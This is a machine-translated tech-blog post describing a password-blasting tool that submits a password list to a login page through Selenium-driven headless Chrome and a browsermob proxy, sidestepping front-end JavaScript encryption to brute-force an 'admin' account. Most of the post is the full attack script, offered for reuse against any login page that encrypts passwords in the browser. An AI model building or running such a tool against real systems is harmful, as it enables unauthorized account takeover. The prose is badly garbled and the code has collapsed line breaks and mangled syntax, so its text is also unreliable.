Shulou(Shulou.com)05/31 Report--

Ignore the js front-end encrypted account password blasting tool JaFak, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Almost persuaded to quit.

So I decided to do something to increase the harm of this hole, and my first thought was to burst a fixed username and password, because the login page of the system, whether your username or password is wrong, returns "username and password or error!" And there is no CAPTCHA verification, and there is no limit on the number of times, and because we enumerated the correct user name, this prompt is equivalent to "password error, please re-enter", you can burst the password of the fixed user name, burp starts, and directly flushes!

Seeing that there is% 3D%3D after the password, I get excited gradually. Isn't this base64 encryption? Direct python script, first base64 encryption, and then burst, comfortable, waiting for the password on the line!

But first to verify whether it is base64 encryption, and then put in burp decoding, I wipe, can not solve, I did not believe it at first, tried several times, really not!

It's okay. Calm down! This thing cryptography, it can reverse its encryption logic without a hand. Oh, my God, my hand?

Then open js, source code analysis, beautiful, a confusion of my ideas around the wire ball!

Give me direct advice to retreat, goodbye project, goodbye Wang an, goodbye hit workers, go home to farm.

a powerful and unconstrained style

But, I do not think it is difficult for me, I can also rescue, because I have seen the boss, through the local establishment of services, to call the system's js, and then for their own use, but also have to find the interface of the encryption function, bp above there are plug-ins, local services, but also have to find the encrypted entry function! Or admire those front-end debugging tough boss, really boss!

Because I have seen a foreign performance testing software before, do not know what name, anyway, quite expensive, can automatically control the browser for performance settings, just like a robot to help you enter, help you submit, help you visit the website, I think cool, and then I think of how to achieve, think of automation, I must immediately think of python,Google search is really there!

If you are looking for Baidu, google will be right!

Start a fantasy journey.

Why do you say Qifengler? Because the story of climbing the pit is really a snot and a handful of tears, stop it, crying fainted in the toilet.

Start using the selenium framework...

What is Selenium? In a word, automated testing tools.

It supports a variety of browsers, including mainstream interface browsers such as Chrome,Safari,Firefox. If you install a Selenium plug-in in these browsers, you can easily test the Web interface. In other words, Selenium supports these browser drivers.

The things used here are python+selenium+browsermobproxy

The first experience of love

Let's start with a small example to feel the Selenium, here we use the Chrome browser to test (of course you can cache other browsers without affecting it).

Note that you have to install a chrome browser before you try this code.

From selenium import webdriverbrowser = webdriver.Chrome () browser.get ('http://www.baidu.com/')

Run this code, it will automatically open the chrome browser, and then open the http://www.baidu.com/ page, fully visual, because you will see your chrome browser open to browse the process.

If the code execution is incorrect and the browser is not open, then the Chrome browser is not installed or the Chrome driver is not configured in the environment variable. Download the driver, and then configure the driver file path in the environment variable

But because it is not enough for our test to submit a burst username and password to open a web page, so

From selenium import webdriverfrom selenium.webdriver.common.keys import Keysdriver = webdriver.Chrome () driver.get ("http://www.python.org")assert" Python "in driver.title# waiting for loading to end elem = driver.find_element_by_name (" Q ") elem.send_keys (" pycon ") elem.send_keys (Keys.RETURN) print (driver.page_source)

This code will traverse the http://www.python.org page, and when the Python font is loaded, it will traverse the html tree structure, find the tag with name Q, fill in pycon, and simulate the click.

Why wait here to load, because the website may have jq what not completely loaded, and then click will lose the original charm.

According to the actual needs, I changed this code to look like this:

From selenium import webdriverfrom selenium.webdriver.common.keys import Keysdriver = webdriver.Chrome () driver.get ("xxxxxxxx") driver.find_element_by_css_selector ("[class='class_name']") .send_keys (username) # find the tag for entering the user name and enter the user name into driver.find_element_by_css_selector ("[class='class_name']") .send_keys (password) # # find the tag for entering the password Enter the user name into driver.find_element_by_css_selector (("[class='class_name']")) .click () # find the login label and click

This simulates a complete user name and password input, as well as the effect of clicking to log in.

Pothole 1: why do you use css_selector here? you can use by_class_name directly, but because I actually use the scene here is very special. There is a space between the names of class, which cannot be obtained by using by_class_name. If there is no space in the name of class, you can get it directly. Of course, you can also access it through other attributes of the tag.

But you can only submit a login request once, and you have to clear the account password you filled in last time, and then improve it.

From selenium import webdriverfrom selenium.webdriver.common.keys import Keysdriver = webdriver.Chrome () driver.get ("xxxxxxxx") # add cyclically to this driver.find_element_by_css_selector ("[class='class_name']") .send_keys (username) # find the tag for entering the user name and enter the user name into driver.find_element_by_css_selector ("[class='class_name']") .send_keys (password) # # find the tag for entering the password Enter the user name into driver.find_element_by_css_selector (("[class='class_name']")) .click () # find the login tag, and then click driver.find_element_by_css_selector ("[class='class_name']") .clear () driver.find_element_by_css_selector ("[class='class_name']") .clear ()

On this basis, add a loop, you can batch burst his password, because the chrome browser has automatically loaded and called js to help us encrypt the ciphertext, and then send it over, what a nice duck!

But there is a problem, that is, I can't capture the return packet of the server. I just started to use selenium to grab the network of chromedriver.

It is very difficult to analyze the captured traffic by yourself, and then use browsermobproxy to open an intermediate agent to let my chrome go through browermobproxy first, and then browermobproxy grabs my http traffic, and then you can get the server return package. It's very nice!

Browsermob-Proxy is an open source LittleProxy-based proxy service written by Java. The specific process of Browsermob-Proxy is somewhat similar to that of Flidder or Charles. That is, a port is opened and exists as a standard proxy. When the HTTP client (browser, etc.) sets this proxy, it can grab all the request details and get the returned content.

Installation:

Download the compressed package directly to the github of the project: https://github.com/lightbody/browsermob-proxy/releases, which supports Linux and Windows.

Install the corresponding python package:

Pip install browsermob-proxy

After downloading browsermob-proxy, put it in a specified directory, for example, here is D:\ apk\ browsermob-proxy-2.1.4-bin\ browsermob-proxy-2.1.4, so the following example code is as follows:

From browsermobproxy import Serverserver = Server ("path") server.start () proxy = server.create_proxy ()

Configure Proxy to start WebDriver:

From selenium import webdriverfrom selenium.webdriver.chrome.options import Optionschrome_options = Options () chrome_options.add_argument ('--proxy-server= {0} '.format (proxy.proxy)) driver = webdriver.Chrome (chrome_options=chrome_options)

It is worth noting that:

Server from browsermob-proxy defaults to port 8080

You can go directly to the Server class to modify its listening port.

Directly according to the actual test requirements, the final code:

Import osimport argparseimport sysfrom selenium import webdriverfrom selenium.webdriver.common.keys import Keysfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilitiesfrom browsermobproxy import Serverfrom selenium.webdriver.chrome.options import Optionsclass Brower_scan (): def _ _ init__ (self,url,username,password_dir): self.url = urlself.response_result = [] self.result= {} self.init_browsermobproxy () self.init_chrome () self.init_dict_list (username,password_dir) self.result_handing () self.end_env () def init_dict_list (self Username,password_dir): with open (password_dir, "r") as f:self.password_list = f.readlines () for password in self.password_list:self.fill_out_a_form (username,password.replace ('\ n' '') self.wget_response () def init_browsermobproxy (self): self.server = Server ("browsermob-proxy-2.1.4\\ bin\\ browsermob-proxy.bat") # browermobproxy file location self.server.start () self.proxy = self.server.create_proxy () self.chrome_options = Options () self.chrome_options.add_argument ('--proxy-server= {0} '.format (self.proxy.proxy)) self.chrome_options.add _ argument ('--headless') # A parameter is added here Do not start the chrome browser, saving the startup time, faster def init_chrome (self): try:self.chrome = webdriver.Chrome (chrome_options=self.chrome_options) self.proxy.new_har ("ht_list2", options= {'captureContent': True}) self.chrome.get (self.url) except Exception as e:print ("Chrome browser startup failed! \ n ") return 0def fill_out_a_form (self,username Password): self.chrome.find_element_by_css_selector ("[class='ivu-input ivu-input-with-prefix']"). Send_keys (username) self.chrome.find_element_by_css_selector ("[class='ivu-input ivu-input-with-suffix']"). Send_keys (password) self.chrome.find_element_by_css_selector (("[class='ivu-btn ivu-btn-primary ivu-btn-large']")) .click () self.chrome.find_element_by_css_selector ("[class='iivu-input ivu-input-with-prefix']") .clear () self.chrome.find_element_by_css_selector ("[class='ivu-input ivu-input-with-suffix']") .clear () def wget_response (self): result = self.proxy.harfor entry in result ['log'] [' entries']: _ url = entry ['request'] [' url'] print (_ Url) if "password" in _ url and "username" in _ url:_response = entry ['response'] _ content = _ response [' content'] # the returned content of the API self.response_result.append (_ response ['content'] [' text']) self.result = dict (zip (self.password_list) Self.response_result) def result_handing (self): for key,value in self.result.items (): print ("password: {key}: result: {result}" .format (key=key) Result=value) def end_env (self): try:self.server.stop () self.chrome.quit () find_netstat = os.popen ("netstat-ano | findstr 8080") # process pid = find_netstat.read () .split () [4] kail_pid = os.popen ("taskkill / F / PID {PID}" .format (PID=pid)) print (kail_pid.read ()) return 1except IndexError as e:return 0Brower = Brower_scan (url,'admin') 'password.txt')

Take the actual blasting effect and browse it:

Pit two:

The actual blasting effect is not like this.

The password input is 123456 123456456789 123456455678955664. Keep growing, as if the cache is not clear, but I do clear

This question has been bothering me for a long time, and I am puzzled.

Finally, under the guidance of the department god, successfully find the cause and solve the problem, really listen to your words, better than 10 years of study, worthy of the boss!

Because the browser from the default is to remember the last password, when I enter an admin account, enter the password, and then the browser remember my account, although wrong, and then continue to type admin, and then the browser will automatically complete 123456, and then I enter a 456789 result is 123456456789. That's it.

All you have to do to change the order is:

Self.chrome.find_element_by_css_selector ("[class='class_name']"). Clear () self.chrome.find_element_by_css_selector ("[class='class_name']"). Send_keys (username) self.chrome.find_element_by_css_selector ("[class='class_name']"). Clear () self.chrome.find_element_by_css_selector ("[class='class_name']"). Send_keys ( Password) self.chrome.find_element_by_css_selector (("[class='class_name']")) .click ()

You just need to clear again before it is completed.

Pit Point 3:

If the login tag uses the click attribute, an error will be reported if there is too much click because the element is wrapped. The solution is to use send_keys ()

Self.chrome.find_element_by_css_selector (("[class='class_name']")) .send_keys (Keys.RETURN)

All right, all the potholes are basically solved here, but there are actually a lot of potholes. I just put the main points out and talk about the final code:

Import osimport argparseimport sysfrom selenium import webdriverfrom selenium.webdriver.common.keys import Keysfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilitiesfrom browsermobproxy import Serverfrom selenium.webdriver.chrome.options import Optionsclass Brower_scan (): def _ _ init__ (self,url,username,password_dir): self.url = urlself.response_result = [] self.result= {} self.init_browsermobproxy () self.init_chrome () self.init_dict_list (username,password_dir) self.result_handing () self.end_env () def init_dict_list (self Username,password_dir): with open (password_dir, "r") as f:self.password_list = f.readlines () for password in self.password_list:self.fill_out_a_form (username,password.replace ('\ n' '') self.wget_response () def init_browsermobproxy (self): self.server = Server ("browsermob-proxy-2.1.4\\ bin\\ browsermob-proxy.bat") # browermobproxy file location self.server.start () self.proxy = self.server.create_proxy () self.chrome_options = Options () self.chrome_options.add_argument ("- incognito") self.chrome_options.add_argument ('--proxy-server= {0}'. Format (self.proxy.proxy)) self.chrome_options.add_argument ('--headless') # A parameter is added here Do not start the chrome browser, saving the startup time, faster def init_chrome (self): try:self.chrome = webdriver.Chrome (chrome_options=self.chrome_options) self.proxy.new_har ("test", options= {'captureContent': True,' captureHeaders': True}) self.chrome.get (self.url) except Exception as e:print ("Chrome browser startup failed! \ n ") return 0def fill_out_a_form (self,username Password): print (password) self.chrome.find_element_by_css_selector ("[class='class_name']"). Clear () # clear the label self.chrome.find_element_by_css_selector ("[class='ivu-input ivu-input-large ivu-input-with-prefix']") in the username input box. Send_keys (username) # enter the user name self.chrome.find_element_by_css_selector ("[class='ivu-input ivu-input]") -large ivu-input-with-prefix ivu-input-with-suffix'] ") .clear () # clear the label self.chrome.find_element_by_css_selector (" [class='class_name'] ") in the password input box. Send_keys (password) # enter the user name self.chrome.find_element_by_css_selector (" [class='class_name'] ") .send_keys (Keys.RETURN) # Click to log in to def wget_response (self): result = self.proxy.harfor entry in result ['log'] [' entries']: _ url = entry ['request'] [' url'] if "password" in _ url and "username" in _ url:_response = entry ['response'] _ content = _ response [' content'] # get API return content self.response_result.append (_ response ['content'] [' text']) self.result = dict (zip (self.password_list) Self.response_result) def result_handing (self): for key,value in self.result.items (): print ("password: {key}: result: {result}" .format (key=key) Result=value) def end_env (self): try:self.server.stop () self.chrome.quit () find_netstat = os.popen ("netstat-ano | findstr 8080") # process pid = find_netstat.read () .split () [4] kail_pid = os.popen ("taskkill / F / PID {PID}" .format (PID=pid)) print (kail_pid.read ()) return 1except IndexError as e:return 0Brower = Brower_scan (url,'admin') 'password.txt')

Here only use this way in the password blasting, but the actual use of the scene is far more than that, I think we can use any js encryption, jq encryption, front-end encryption, can be used, there is no need to analyze its js front-end encryption code, just need to simulate the blasting behavior of normal user behavior on Oke, I have to say, this intelligent way is really too convenient! It smells so good! Now you can only find the input box and login button through class, and you can modify the source code if you need to use id or other identifiers.

After reading the above, have you mastered how to use the account password blasting tool JaFak, which is encrypted at the front end of js? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.